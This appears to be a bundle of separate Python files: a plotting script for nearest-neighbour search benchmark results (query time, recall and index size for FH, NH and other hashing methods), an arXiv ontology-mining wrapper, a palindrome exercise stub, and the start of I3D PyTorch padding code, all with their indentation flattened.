res = records_pattern.match(line)
if res:
top_k = int(res.group(1))
ratio = float(res.group(2))
qtime = float(res.group(3))
recall = float(res.group(4))
precision = float(res.group(5))
fraction = float(res.group(6))
# print(top_k, ratio, qtime, recall, precision, fraction)
if top_k == chosen_top_k:
yield ((cand, params), (top_k, chosen_k, memory_usage,
ratio, qtime, recall, precision, fraction))
# ------------------------------------------------------------------------------
def getindexingtime(res):
return res[1]
def getindexsize(res):
return res[2]
def getratio(res):
return res[3]
def gettime(res):
return res[4]
def getrecall(res):
return res[5]
def getprecision(res):
return res[6]
def getfraction(res):
return res[7]
def get_cand(res):
return int(res[0][0])
def get_l(res):
return int(res[0][1]['l'])
def get_m(res):
return int(res[0][1]['m'])
def get_s(res):
return int(res[0][1]['s'])
def get_time(res):
return float(res[1][4])
def get_recall(res):
return float(res[1][5])
def get_precision(res):
return float(res[1][6])
def get_fraction(res):
return float(res[1][7])
# ------------------------------------------------------------------------------
def lower_bound_curve(xys):
'''
get the time-recall curve by convex hull and interpolation
:params xys: 2-dim array (np.array)
:returns: time-recall curve with interpolation
'''
# add noise and conduct convex hull to find the curve
eps = np.random.normal(size=xys.shape) * 1e-6
xys += eps
# print(xys)
hull = ConvexHull(xys)
hull_vs = xys[hull.vertices]
# hull_vs = np.array(sorted(hull_vs, key=lambda x:x[1]))
# print("hull_vs: ", hull_vs)
# find max pair (maxv0) and min pairs (v1s) from the convex hull
v1s = []
maxv0 = [-1, -1]
for v0, v1 in zip(hull_vs, chain(hull_vs[1:], hull_vs[:1])):
# print(v0, v1)
if v0[1] > v1[1] and v0[0] > v1[0]:
v1s = np.append(v1s, v1, axis=-1)
if v0[1] > maxv0[1]:
maxv0 = v0
# print(v1s, maxv0)
# interpolation: vs[:, 1] -> recall (x), vs[:, 0] -> time (y)
vs = np.array(np.append(maxv0, v1s)).reshape(-1, 2) # 2-dim array
f = interp1d(vs[:, 1], vs[:, 0])
minx = np.min(vs[:, 1]) + 1e-6
maxx = np.max(vs[:, 1]) - 1e-6
x = np.arange(minx, maxx, 1.0) # the interval of interpolation: 1.0
y = list(map(f, x)) # get time (y) by interpolation
return x, y
# ------------------------------------------------------------------------------
def upper_bound_curve(xys, interval, is_sorted):
'''
get the time-ratio and precision-recall curves by convex hull and interpolation
:params xys: 2-dim array (np.array)
:params interval: the interval of interpolation (float)
:params is_sorted: sort the convex hull or not (boolean)
:returns: curve with interpolation
'''
# add noise and conduct convex hull to find the curve
eps = np.random.normal(size=xys.shape) * 1e-6
xys += eps
# print(xys)
xs = xys[:, 0]
if len(xs) > 2 and xs[-1] > 0:
hull = ConvexHull(xys)
hull_vs = xys[hull.vertices]
if is_sorted:
hull_vs = np.array(sorted(hull_vs, key=lambda x:x[1]))
print("hull_vs: ", hull_vs)
# find max pair (maxv0) and min pairs (v1s) from the convex hull
v1s = []
maxv0 = [-1, -1]
for v0, v1 in zip(hull_vs, chain(hull_vs[1:], hull_vs[:1])):
# print(v0, v1)
if v0[1] > v1[1] and v0[0] < v1[0]:
v1s = np.append(v1s, v1, axis=-1)
if v0[1] > maxv0[1]:
maxv0 = v0
print(v1s, maxv0)
# interpolation: vs[:, 1] -> recall (x), vs[:, 0] -> time (y)
vs = np.array(np.append(maxv0, v1s)).reshape(-1, 2) # 2-dim array
if len(vs) >= 2:
f = interp1d(vs[:, 1], vs[:, 0])
minx = np.min(vs[:, 1]) + 1e-6
maxx = np.max(vs[:, 1]) - 1e-6
x = np.arange(minx, maxx, interval)
y = list(map(f, x)) # get time (y) by interpolation
return x, y
else:
return xys[:, 0], xys[:, 1]
else:
return xys[:, 0], xys[:, 1]
# ------------------------------------------------------------------------------
def lower_bound_curve2(xys):
'''
get the querytime-indexsize and querytime-indextime curve by convex hull
:params xys: 2-dim array (np.array)
:returns: querytime-indexsize and querytime-indextime curve
'''
# add noise and conduct convex hull to find the curve
eps = np.random.normal(size=xys.shape) * 1e-6
xys += eps
# print(xys)
xs = xys[:, 0]
if len(xs) > 2 and xs[-1] > 0:
# conduct convex hull to find the curve
hull = ConvexHull(xys)
hull_vs = xys[hull.vertices]
# print("hull_vs: ", hull_vs)
ret_vs = []
for v0, v1, v2 in zip(chain(hull_vs[-1:], hull_vs[:-1]), hull_vs, \
chain(hull_vs[1:], hull_vs[:1])):
# print(v0, v1, v2)
if v0[0] < v1[0] or v1[0] < v2[0]:
ret_vs = np.append(ret_vs, v1, axis=-1)
# sort the results in ascending order of x without interpolation
ret_vs = ret_vs.reshape((-1, 2))
ret_vs = np.array(sorted(ret_vs, key=lambda x:x[0]))
return ret_vs[:, 0], ret_vs[:, 1]
else:
return xys[:, 0], xys[:, 1]
# ------------------------------------------------------------------------------
def plot_time_fraction_recall(chosen_top_k, methods, input_folder, output_folder):
'''
draw the querytime-recall curves and fraction-recall curves for all methods
on all datasets
:params chosen_top_k: top_k value for drawing figure (integer)
:params methods: a list of method (list)
:params input_folder: input folder (string)
:params output_folder: output folder (string)
:returns: None
'''
n_datasets = len(datasets)
fig_width, fig_height = calc_width_and_height(n_datasets, 2)
plt_helper = PlotHelper(plt, fig_width, fig_height)
plt_helper.plot_subplots_adjust() # define a window for a figure
method_labels = [method_labels_map[method] for method in methods]
for di, (dataset, dataset_label) in enumerate(zip(datasets, dataset_labels)):
# set up two sub-figures
ax_recall = plt.subplot(2, n_datasets, di+1)
plt.title(dataset_label) # title
plt.xlabel('Recall (%)') # label of x-axis
plt.xlim(0, 100) # limit (or range) of x-axis
ax_fraction = plt.subplot(2, n_datasets, n_datasets+di+1)
plt.xlabel('Recall (%)') # label of x-axis
plt.xlim(0, 100) # limit (or range) of x-axis
if di == 0:
ax_recall.set_ylabel('Query Time (ms)')
ax_fraction.set_ylabel('Fraction (%)')
min_t_y = 1e9; max_t_y = -1e9
min_f_y = 1e9; max_f_y = -1e9
for method_idx, method, method_label, method_color, method_marker in \
zip(count(), methods, method_labels, method_colors, method_markers):
# get file name for this method on this dataset
filename = get_filename(input_folder, dataset, method)
if filename is None: continue
print(filename)
# get time-recall and fraction-recall results from disk
time_recalls = []
fraction_recalls = []
for _,res in parse_res(filename, chosen_top_k):
time_recalls += [[gettime(res), getrecall(res)]]
fraction_recalls += [[getfraction(res), getrecall(res)]]
time_recalls = np.array(time_recalls)
fraction_recalls = np.array(fraction_recalls)
# print(time_recalls, fraction_recalls)
# get the time-recall curve by convex hull and interpolation
lower_recalls, lower_times = lower_bound_curve(time_recalls)
min_t_y = min(min_t_y, np.min(lower_times))
max_t_y = max(max_t_y, np.max(lower_times))
ax_recall.semilogy(lower_recalls, lower_times, '-',
color=method_color, marker=method_marker,
label=method_label if di==0 else "", markevery=10,
markerfacecolor='none', markersize=10)
# get the fraction-recall curve by convex hull
lower_recalls, lower_fractions = lower_bound_curve(fraction_recalls)
min_f_y = min(min_f_y, np.min(lower_fractions))
max_f_y = max(max_f_y, np.max(lower_fractions))
ax_fraction.semilogy(lower_recalls, lower_fractions, '-',
color=method_color, marker=method_marker, label="",
markevery=10, markerfacecolor='none', markersize=10,
zorder=len(methods)-method_idx)
# set up the limit (or range) of y-axis
plt_helper.set_y_axis_log10(ax_recall, min_t_y, max_t_y)
plt_helper.set_y_axis_log10(ax_fraction, min_f_y, max_f_y)
# plot legend and save figure
plt_helper.plot_fig_legend(ncol=len(methods))
plt_helper.plot_and_save(output_folder, 'time_fraction_recall')
# ------------------------------------------------------------------------------
def plot_time_index_k(chosen_top_k, chosen_top_ks, recall_level, size_x_scales,\
time_x_scales, methods, input_folder, output_folder):
'''
draw the querytime-indexsize curves and querytime-indexingtime curves for
all methods on all datasets
:params chosen_top_k: top_k value for drawing figure (integer)
:params chosen_top_ks: a list of op_k values for drawing figure (list)
:params recall_level: recall value for drawing figure (integer)
:params size_x_scales: a list of x scales for index size (list)
:params time_x_scales: a list of x scales for indexing time (list)
:params methods: a list of method (list)
:params input_folder: input folder (string)
:params output_folder: output folder (string)
:returns: None
'''
n_datasets = len(datasets)
fig_width, fig_height = calc_width_and_height(n_datasets, 3)
plt_helper = PlotHelper(plt, fig_width, fig_height)
plt_helper.plot_subplots_adjust() # define a window for a figure
method_labels = [method_labels_map[method] for method in methods]
for di, (dataset, dataset_label) in enumerate(zip(datasets, dataset_labels)):
# set up three sub-figures
ax_size = plt.subplot(3, n_datasets, di+1)
plt.title(dataset_label) # title
plt.xlabel('Index Size (MB)') # label of x-axis
ax_time = plt.subplot(3, n_datasets, n_datasets+di+1)
plt.xlabel('Indexing Time (Seconds)') # label of x-axis
ax_k = plt.subplot(3, n_datasets, 2*n_datasets+di+1)
plt.xlabel('$k$') # label of x-axis
if di == 0:
ax_size.set_ylabel('Query Time (ms)')
ax_time.set_ylabel('Query Time (ms)')
ax_k.set_ylabel('Query Time (ms)')
min_size_x = 1e9; max_size_x = -1e9
min_size_y = 1e9; max_size_y = -1e9
min_time_x = 1e9; max_time_x = -1e9
min_time_y = 1e9; max_time_y = -1e9
min_k_y = 1e9; max_k_y = -1e9
for method_idx, method, method_label, method_color, method_marker in \
zip(count(), methods, method_labels, method_colors, method_markers):
# get file name for this method on this dataset
filename = get_filename(input_folder, dataset, method)
if filename is None: continue
print(filename)
# ------------------------------------------------------------------
# query time vs. index size and indexing time
# ------------------------------------------------------------------
# get all results from disk
chosen_ks_dict = defaultdict(list)
for _,res in parse_res(filename, chosen_top_k):
query_time = gettime(res)
recall = getrecall(res)
index_time = getindexingtime(res)
index_size = getindexsize(res)
chosen_ks_dict[(index_time, index_size)] += [[recall, query_time]]
# get querytime-indexsize and querytime-indexingtime results if its
# recall is higher than recall_level
index_times, index_sizes, querytimes_at_recall = [], [], []
for (index_time, index_size), recall_querytimes_ in chosen_ks_dict.items():
# add [[0, 0]] for interpolation
recall_querytimes_ = np.array([[0, 0]] + recall_querytimes_)
recalls, query_times = lower_bound_curve2(recall_querytimes_)
if np.max(recalls) > recall_level:
# get the estimated time at recall level by interpolation
f = interp1d(recalls, query_times)
querytime_at_recall = f(recall_level)
# update results
index_times += [index_time]
index_sizes += [index_size]
querytimes_at_recall += [querytime_at_recall]
# print('interp, ', querytime_at_recall, index_size, index_time)
index_times = np.array(index_times)
index_sizes = np.array(index_sizes)
querytimes_at_recall = np.array(querytimes_at_recall)
# get the querytime-indexsize curve by convex hull
isize_qtime = np.zeros(shape=(len(index_sizes), 2))
isize_qtime[:, 0] = index_sizes
isize_qtime[:, 1] = querytimes_at_recall
lower_isizes, lower_qtimes = lower_bound_curve2(isize_qtime)
if len(lower_isizes) > 0:
# print(method, lower_isizes, lower_qtimes)
min_size_x = min(min_size_x, np.min(lower_isizes))
max_size_x = max(max_size_x, np.max(lower_isizes))
min_size_y = min(min_size_y, np.min(lower_qtimes))
max_size_y = max(max_size_y, np.max(lower_qtimes))
ax_size.semilogy(lower_isizes, lower_qtimes, '-', color=method_color,
marker=method_marker, label=method_label if di==0 else "",
markerfacecolor='none', markersize=10)
# get the querytime-indextime curve by convex hull
itime_qtime = np.zeros(shape=(len(index_times), 2))
itime_qtime[:, 0] = index_times
itime_qtime[:, 1] = querytimes_at_recall
lower_itimes, lower_qtimes = lower_bound_curve2(itime_qtime)
# print(method, lower_itimes, lower_qtimes)
min_time_x = min(min_time_x, np.min(lower_itimes))
max_time_x = max(max_time_x, np.max(lower_itimes))
min_time_y = min(min_time_y, np.min(lower_qtimes))
max_time_y = max(max_time_y, np.max(lower_qtimes))
ax_time.semilogy(lower_itimes, lower_qtimes, '-', color=method_color,
marker=method_marker, label="", markerfacecolor='none',
markersize=10, zorder=len(methods)-method_idx)
# ------------------------------------------------------------------
# query time vs. k
# ------------------------------------------------------------------
# get all results from disk
chosen_ks_dict = defaultdict(list)
for chosen_top_k in chosen_top_ks:
for _,res in parse_res(filename, chosen_top_k):
query_time = gettime(res)
recall = getrecall(res)
chosen_ks_dict[chosen_top_k] += [[recall, query_time]]
# get querytime-indexsize and querytime-indexingtime results if its
# recall is higher than recall_level
chosen_ks, querytimes_at_recall = [], []
for chosen_k, recall_querytimes_ in chosen_ks_dict.items():
# add [[0, 0]] for interpolation
recall_querytimes_ = np.array([[0, 0]] + recall_querytimes_)
recalls, query_times = lower_bound_curve2(recall_querytimes_)
if np.max(recalls) > recall_level:
# get the estimated time at recall level by interpolation
f = interp1d(recalls, query_times)
querytime_at_recall = f(recall_level)
# update results
chosen_ks += [chosen_k]
querytimes_at_recall += [querytime_at_recall]
chosen_ks = np.array(chosen_ks)
querytimes_at_recall = np.array(querytimes_at_recall)
min_k_y = min(min_k_y, np.min(querytimes_at_recall))
max_k_y = max(max_k_y, np.max(querytimes_at_recall))
ax_k.semilogy(chosen_ks, querytimes_at_recall, '-', color=method_color,
marker=method_marker, label="", markerfacecolor='none',
markersize=10, zorder=len(methods)-method_idx)
# set up the limit (or range) of y-axis
plt_helper.set_x_axis(ax_size, min_size_x, size_x_scales[di]*max_size_x)
plt_helper.set_y_axis_log10(ax_size, min_size_y, max_size_y)
plt_helper.set_x_axis(ax_time, min_time_x, time_x_scales[di]*max_time_x)
plt_helper.set_y_axis_log10(ax_time, min_time_y, max_time_y)
plt_helper.set_y_axis_log10(ax_k, min_k_y, max_k_y)
# plot legend and save figure
plt_helper.plot_fig_legend(ncol=len(methods))
plt_helper.plot_and_save(output_folder, 'time_index_k_%d' % recall_level)
# ------------------------------------------------------------------------------
def plot_time_recall_indextime(chosen_top_k, recall_level, time_x_scales, \
methods, input_folder, output_folder):
'''
draw the querytime-indexsize curves and querytime-indexingtime curves for
all methods on all datasets
:params chosen_top_k: top_k value for drawing figure (integer)
:params recall_level: recall value for drawing figure (integer)
:params time_x_scales: a list of x scales for indexing time (list)
:params methods: a list of method (list)
:params input_folder: input folder (string)
:params output_folder: output folder (string)
:returns: None
'''
n_datasets = len(datasets)
fig_width, fig_height = calc_width_and_height(n_datasets, 2)
plt_helper = PlotHelper(plt, fig_width, fig_height)
plt_helper.plot_subplots_adjust() # define a window for a figure
method_labels = [method_labels_map[method] for method in methods]
for di, (dataset, dataset_label) in enumerate(zip(datasets, dataset_labels)):
# set up sub-figure
ax_recall = plt.subplot(2, n_datasets, di+1)
plt.title(dataset_label) # title
plt.xlim(0, 100) # limit (or range) of x-axis
plt.xlabel('Recall (%)') # label of x-axis
ax_time = plt.subplot(2, n_datasets, n_datasets+di+1)
plt.xlabel('Indexing Time (Seconds)') # label of x-axis
if di == 0:
ax_recall.set_ylabel('Query Time (ms)')
ax_time.set_ylabel('Query Time (ms)')
min_r_y = 1e9; max_r_y = -1e9
min_t_x = 1e9; max_t_x = -1e9
min_t_y = 1e9; max_t_y = -1e9
for method_idx, method, method_label, method_color, method_marker in \
zip(count(), methods, method_labels, method_colors, method_markers):
# get file name for this method on this dataset
filename = get_filename(input_folder, dataset, method)
if filename is None: continue
print(filename)
# ------------------------------------------------------------------
# query time vs. recall
# ------------------------------------------------------------------
time_recalls = []
for _,res in parse_res(filename, chosen_top_k):
time_recalls += [[gettime(res), getrecall(res)]]
time_recalls = np.array(time_recalls)
# print(time_recalls)
# get the time-recall curve by convex hull and interpolation, where
# lower_recalls -> x, lower_times -> y
lower_recalls, lower_times = lower_bound_curve(time_recalls)
min_r_y = min(min_r_y, np.min(lower_times))
max_r_y = max(max_r_y, np.max(lower_times))
ax_recall.semilogy(lower_recalls, lower_times, '-', color=method_color,
marker=method_marker, label=method_label if di==0 else "",
markevery=10, markerfacecolor='none', markersize=7,
zorder=len(methods)-method_idx)
# ------------------------------------------------------------------
# query time vs. indexing time
# ------------------------------------------------------------------
# get all results from disk
chosen_ks_dict = defaultdict(list)
for _,res in parse_res(filename, chosen_top_k):
query_time = gettime(res)
recall = getrecall(res)
index_time = getindexingtime(res)
chosen_ks_dict[index_time] += [[recall, query_time]]
# get querytime-indexsize and querytime-indexingtime results if its
# recall is higher than recall_level
index_times, querytimes_at_recall = [], []
for index_time, recall_querytimes_ in chosen_ks_dict.items():
# add [[0, 0]] for interpolation
recall_querytimes_ = np.array([[0, 0]] +recall_querytimes_)
recalls, query_times = lower_bound_curve2(recall_querytimes_)
if np.max(recalls) > recall_level:
# get the estimated time at recall level by interpolation
f = interp1d(recalls, query_times)
querytime_at_recall = f(recall_level)
# update results
index_times += [index_time]
querytimes_at_recall += [querytime_at_recall]
# print('interp, ', querytime_at_recall, index_time)
index_times = np.array(index_times)
querytimes_at_recall = np.array(querytimes_at_recall)
# get the querytime-indextime curve by convex hull
itime_qtimes = np.zeros(shape=(len(index_times), 2))
itime_qtimes[:, 0] = index_times
itime_qtimes[:, 1] = querytimes_at_recall
lower_itimes, lower_qtimes = lower_bound_curve2(itime_qtimes)
if len(lower_itimes) > 0:
# print(method, lower_itimes, lower_qtimes)
min_t_x = min(min_t_x, np.min(lower_itimes))
max_t_x = max(max_t_x, np.max(lower_itimes))
min_t_y = min(min_t_y, np.min(lower_qtimes))
max_t_y = max(max_t_y, np.max(lower_qtimes))
ax_time.semilogy(lower_itimes, lower_qtimes, '-', color=method_color,
marker=method_marker, label="", markerfacecolor='none',
markersize=10, zorder=len(methods)-method_idx)
# set up the limit (or range) of y-axis
plt_helper.set_y_axis_log10(ax_recall, min_r_y, max_r_y)
plt_helper.set_x_axis(ax_time, min_t_x, time_x_scales[di]*max_t_x)
if max_t_y / min_t_y < 10:
plt_helper.set_y_axis_close(ax_time, min_t_y, max_t_y)
else:
plt_helper.set_y_axis_log10(ax_time, min_t_y, max_t_y)
# plot legend and save figure
plt_helper.plot_fig_legend(ncol=len(methods))
plt_helper.plot_and_save(output_folder, 'time_recall_indextime_%d' %
recall_level)
# ------------------------------------------------------------------------------
def plot_params(chosen_top_k, dataset, input_folder, output_folder, \
fig_width=19.2, fig_height=3.0):
'''
draw the querytime-recall curves for the parameters of NH and FH
:params chosen_top_k: top_k value for drawing figure (integer)
:params dataset: name of dataset (string)
:params input_folder: input folder (string)
:params output_folder: output folder (string)
:params fig_width: the width of a figure (float)
:params fig_height: the height of a figure (float)
:returns: None
'''
plt.figure(figsize=(fig_width, fig_height))
plt.rcParams.update({'font.size': 13})
left_space = 0.80
bottom_space = 0.55
top_space = 0.30 # 1.2
right_space = 0.25
width_space = 0.24
height_space = 0.37
bottom = bottom_space / fig_height
top = (fig_height - top_space) / fig_height
left = left_space / fig_width
right = (fig_width - right_space) / fig_width
plt.subplots_adjust(bottom=bottom, top=top, left=left, right=right,
wspace=width_space, hspace=height_space)
# --------------------------------------------------------------------------
# NH on t (\lambda = 2d)
# --------------------------------------------------------------------------
method = 'NH'
ax = plt.subplot(1, 5, 1)
ax.set_xlabel(r'Recall (%)')
ax.set_ylabel(r'Query Time (ms)')
ax.set_title('Impact of $t$ for %s' % method, fontsize=16)
filename = get_filename(input_folder, dataset, method)
print(filename, method, dataset)
fix_s=2
data = []
for record in parse_res(filename, chosen_top_k):
m = get_m(record)
s = get_s(record)
cand = get_cand(record)
time = get_time(record)
recall = get_recall(record)
if s == fix_s:
data += [[m, s, cand, time, recall]]
data = np.array(data)
legend_name = ['$t=8$', '$t=16$', '$t=32$', '$t=64$', '$t=128$', '$t=256$']
ms = [8, 16, 32, 64, 128, 256]
for color, marker, m in zip(method_colors, method_markers, ms):
data_mp = data[data[:, 0]==m]
ax.plot(data_mp[:, -1], data_mp[:, -2], marker=marker,c=color,
markerfacecolor='none', markersize=7)
plt.legend(legend_name, loc='upper right', ncol=2, fontsize=13)
plt.xlim(0, 100)
ax.set_yscale('log')
# plt.ylim(1e-2, 1e3) # Yelp
plt.ylim(1e-1, 1e5) # GloVe100
# --------------------------------------------------------------------------
# NH on \lambda (t = 256)
# --------------------------------------------------------------------------
method = 'NH'
ax = plt.subplot(1, 5, 2)
ax.set_xlabel(r'Recall (%)')
ax.set_title('Impact of $\lambda$ for %s' % method, fontsize=16)
filename = get_filename(input_folder, dataset, method)
print(filename, method, dataset)
fix_m=256
data = []
for record in parse_res(filename, chosen_top_k):
m = get_m(record)
s = get_s(record)
cand = get_cand(record)
time = get_time(record)
recall = get_recall(record)
if m == fix_m:
data += [[m, s, cand, time, recall]]
data = np.array(data)
legend_name = ['$\lambda=1d$', '$\lambda=2d$', '$\lambda=4d$', '$\lambda=8d$']
ss = [1, 2, 4, 8]
for color, marker, s in zip(method_colors, method_markers, ss):
data_mp = data[data[:, 1]==s]
ax.plot(data_mp[:, -1], data_mp[:, -2], marker=marker, c=color,
markerfacecolor='none', markersize=7)
plt.legend(legend_name, loc='upper right', ncol=2, fontsize=13)
plt.xlim(0, 100)
ax.set_yscale('log')
# plt.ylim(1e-1, 1e2) # Yelp
plt.ylim(1e-1, 1e5) # GloVe100
# --------------------------------------------------------------------------
# FH on m (l = 4 and \lambda = 2d)
# --------------------------------------------------------------------------
method = 'FH'
ax = plt.subplot(1, 5, 3)
ax.set_xlabel(r'Recall (%)')
ax.set_title('Impact of $m$ for %s' % method, fontsize=16)
filename = get_filename(input_folder, dataset, method)
print(filename, method, dataset)
fix_l=4; fix_s=2
data = []
for record in parse_res(filename, chosen_top_k):
m = get_m(record)
l = get_l(record)
s = get_s(record)
cand = get_cand(record)
time = get_time(record)
recall = get_recall(record)
if l == fix_l and s == fix_s:
data += [[m, l, s, cand, time, recall]]
data = np.array(data)
legend_name = ['$m=8$', '$m=16$', '$m=32$', '$m=64$', '$m=128$', '$m=256$']
ms = [8, 16, 32, 64, 128, 256]
for color, marker, m in zip(method_colors, method_markers, ms):
data_mp = data[data[:, 0]==m]
ax.plot(data_mp[:, -1], data_mp[:, -2], marker=marker, c=color,
markerfacecolor='none', markersize=7)
plt.legend(legend_name, loc='upper right', ncol=2, fontsize=13)
plt.xlim(0, 100)
ax.set_yscale('log')
# plt.ylim(1e-2, 1e2) # Yelp
plt.ylim(1e-2, 1e4) # GloVe100
# --------------------------------------------------------------------------
# FH on l (m = 16 and \lambda = 2d)
# --------------------------------------------------------------------------
method = 'FH'
ax = plt.subplot(1, 5, 4)
ax.set_xlabel(r'Recall (%)')
ax.set_title('Impact of $l$ for %s' % method, fontsize=16)
filename = get_filename(input_folder, dataset, method)
print(filename, method, dataset)
fix_m=16; fix_s=2
data = []
for record in parse_res(filename, chosen_top_k):
m = get_m(record)
l = get_l(record)
s = get_s(record)
cand = get_cand(record)
time = get_time(record)
recall = get_recall(record)
if m == fix_m and s == fix_s:
data += [[m, l, s, cand, time, recall]]
data = np.array(data)
legend_name = ['$l=2$', '$l=4$', '$l=6$', '$l=8$', '$l=10$']
ls = [2, 4, 6, 8, 10]
for color, marker, l in zip(method_colors, method_markers, ls):
data_mp = data[data[:, 1]==l]
ax.plot(data_mp[:, -1], data_mp[:, -2], marker=marker, c=color,
markerfacecolor='none', markersize=7)
plt.legend(legend_name, loc='upper right', ncol=2, fontsize=13)
plt.xlim(0, 100)
ax.set_yscale('log')
# plt.ylim(1e-2, 1e2) # Yelp
plt.ylim(1e-2, 1e4) # GloVe100
# --------------------------------------------------------------------------
# FH on \lambda (m = 16 and l = 4)
# --------------------------------------------------------------------------
method = 'FH'
ax = plt.subplot(1, 5, 5)
ax.set_xlabel(r'Recall (%)')
ax.set_title('Impact of $\lambda$ for %s' % method, fontsize=16)
filename = get_filename(input_folder, dataset, method)
print(filename, method, dataset)
fix_m=16; fix_l=4
data = []
for record in parse_res(filename, chosen_top_k):
m = get_m(record)
l = get_l(record)
s = get_s(record)
cand = get_cand(record)
time = get_time(record)
recall = get_recall(record)
if m == fix_m and l == fix_l:
data += [[m, l, s, cand, time, recall]]
data = np.array(data)
legend_name = ['$\lambda=1d$', '$\lambda=2d$', '$\lambda=4d$', '$\lambda=8d$']
ss = [1, 2, 4, 8]
miny = 1e9; maxy = -1e9
for color, marker, s in zip(method_colors, method_markers, ss):
data_mp = data[data[:, 2]==s]
ax.plot(data_mp[:, -1], data_mp[:, -2], marker=marker, c=color,
markerfacecolor='none', markersize=7)
plt.legend(legend_name, loc='upper right', ncol=2, fontsize=13)
plt.xlim(0, 100)
ax.set_yscale('log')
# plt.ylim(1e-2, 1e2) # Yelp
plt.ylim(1e-2, 1e4) # GloVe100
# --------------------------------------------------------------------------
# save and show figure
# --------------------------------------------------------------------------
plt.savefig('%s.png' % join(output_folder, 'params_%s' % dataset))
plt.savefig('%s.eps' % join(output_folder, 'params_%s' % dataset))
plt.savefig('%s.pdf' % join(output_folder, 'params_%s' % dataset))
plt.show()
# ------------------------------------------------------------------------------
if __name__ == '__main__':
chosen_top_k = 10
chosen_top_ks = [1,5,10,20,50,100]
# 1. plot curves of time vs. recall & fraction vs. recall
input_folder = "../results/"
output_folder = "../figures/competitors/"
methods = ['FH', 'FH_Minus', 'NH', 'BH', 'MH', 'Random_Scan', 'Sorted_Scan']
plot_time_fraction_recall(chosen_top_k, methods, input_folder, output_folder)
# 2. plot curves of time vs. index (size and time) & time vs. k
input_folder = "../results/"
output_folder = "../figures/competitors/"
methods = ['FH', 'FH_Minus', 'NH', 'BH', 'MH', 'Random_Scan', 'Sorted_Scan']
size_x_scales = [0.3,0.3,0.3,0.3,0.3]; time_x_scales = [0.1,0.1,0.1,0.3,0.05]
recall_levels = [80,70,60,50]
for recall_level in recall_levels:
plot_time_index_k(chosen_top_k, chosen_top_ks, recall_level, size_x_scales,
time_x_scales, methods, input_folder, output_folder)
# 3. plot curves of time vs. recall & time vs. indexing time
input_folder = "../results/"
output_folder = "../figures/sampling/"
methods = ['FH', 'FH_Minus', 'NH', 'FH_wo_S', 'FH_Minus_wo_S', 'NH_wo_S']
time_x_scales = [0.2, 0.1, 0.1, 0.2, 0.02]
recall_levels = [80,70,60,50]
for recall_level in recall_levels:
plot_time_recall_indextime(chosen_top_k, recall_level, time_x_scales,
methods, input_folder, output_folder)
# 4. plot parameters
chosen_top_k = 10
datasets = ['GloVe100', 'Music', 'Msong', 'Yelp', 'Tiny1M']
input_folder = "../results/"
output_folder = "../figures/param/"
for dataset in datasets:
plot_params(chosen_top_k, dataset, input_folder, output_folder)
# 5. plot curves of time vs. recall & time vs. indexing time for normalized data
input_folder = "../results_normalized/"
output_folder = "../figures/normalized/"
methods = ['FH', 'NH', 'Orig_BH', 'Orig_MH']
recall_level = 50; time_x_scales = [0.1, 0.1, 0.1, 0.05, 0.02]
plot_time_recall_indextime(chosen_top_k, recall_level, time_x_scales, methods,
input_folder, output_folder)
recall_level = 60; time_x_scales = [0.1, 0.1, 0.1, 0.05, 0.02]
plot_time_recall_indextime(chosen_top_k, recall_level, time_x_scales, methods,
input_folder, output_folder)
recall_level = 70; time_x_scales = [0.1, 0.2, 0.1, 0.1, 0.04]
plot_time_recall_indextime(chosen_top_k, recall_level, time_x_scales, methods,
input_folder, output_folder)
recall_level = 80; time_x_scales = [0.1, 0.2, 0.1, 0.1, 0.08]
plot_time_recall_indextime(chosen_top_k, recall_level, time_x_scales, methods,
input_folder, output_folder)
|
157693
|
ONTOLOGY_MINABLE = True
try:
import classifier.classifier as CSO
except:
ONTOLOGY_MINABLE = False
print("No CSO Classifier Present")
from typing import List
from .record import ArxivIdentity,Ontology,ArxivSematicParsedResearch
class OntologyMiner:
is_minable = ONTOLOGY_MINABLE
@staticmethod
def mine_paper(record:ArxivIdentity):
ontology = None
try:
cso_ontology = CSO.run_cso_classifier({"title":record.title,"abstract":record.abstract})
ontology = Ontology(
mined=True, **cso_ontology
)
except Exception as e:
ontology = Ontology()
return ontology
@staticmethod
def mine_lots_of_papers(records:List[ArxivSematicParsedResearch],workers=1):
ontologies = []
try:
mine_dict = {}
id_dict = {}
for r in records:
mine_dict[r.identity.identity] = {"title":r.identity.title,"abstract":r.identity.abstract}
id_dict[r.identity.identity] = r
if workers == 1:
cso_ontology = CSO.run_cso_classifier_batch_model_single_worker(mine_dict)
else:
cso_ontology = CSO.run_cso_classifier_batch_mode(mine_dict,workers=workers)
for ontid in cso_ontology:
identity = id_dict[ontid]
ontology = Ontology(
mined=True, **cso_ontology[ontid]
)
ontologies.append(
(identity,ontology)
)
except Exception as e:
print("Exception : ",e)
return []
return ontologies
|
157755
|
def is_palindrome(line: str) -> bool:
# Здесь реализация вашего решения
pass
print(is_palindrome(input().strip()))
|
157759
|
import math
import os
import torch
import numpy as np
## Code taken from https://github.com/hassony2/kinetics_i3d_pytorch/blob/master/src/i3dpt.py
def get_padding_shape(filter_shape, stride, mod=0):
"""Fetch a tuple describing the input padding shape.
NOTES: To replicate "TF SAME" style padding, the padding shape needs to be
determined at runtime to handle cases when the input dimension is not divisible
by the stride.
See https://stackoverflow.com/a/49842071 for explanation of TF SAME padding logic
"""
def _pad_top_bottom(filter_dim, stride_val, mod):
if mod:
pad_along = max(filter_dim - mod, 0)
else:
pad_along = max(filter_dim - stride_val, 0)
pad_top = pad_along // 2
pad_bottom = pad_along - pad_top
return pad_top, pad_bottom
padding_shape = []
for idx, (filter_dim, stride_val) in enumerate(zip(filter_shape, stride)):
depth_mod = (idx == 0) and mod
pad_top, pad_bottom = _pad_top_bottom(filter_dim, stride_val, depth_mod)
padding_shape.append(pad_top)
padding_shape.append(pad_bottom)
depth_top = padding_shape.pop(0)
depth_bottom = padding_shape.pop(0)
padding_shape.append(depth_top)
padding_shape.append(depth_bottom)
return tuple(padding_shape)
def simplify_padding(padding_shapes):
all_same = True
padding_init = padding_shapes[0]
for pad in padding_shapes[1:]:
if pad != padding_init:
all_same = False
return all_same, padding_init
class Unit3Dpy(torch.nn.Module):
def __init__(self,
in_channels,
out_channels,
kernel_size=(1, 1, 1),
stride=(1, 1, 1),
activation='relu',
padding='SAME',
use_bias=False,
use_bn=True):
super(Unit3Dpy, self).__init__()
self.padding = padding
self.activation = activation
self.use_bn = use_bn
self.stride = stride
if padding == 'SAME':
padding_shape = get_padding_shape(kernel_size, stride)
simplify_pad, pad_size = simplify_padding(padding_shape)
self.simplify_pad = simplify_pad
if stride[0] > 1:
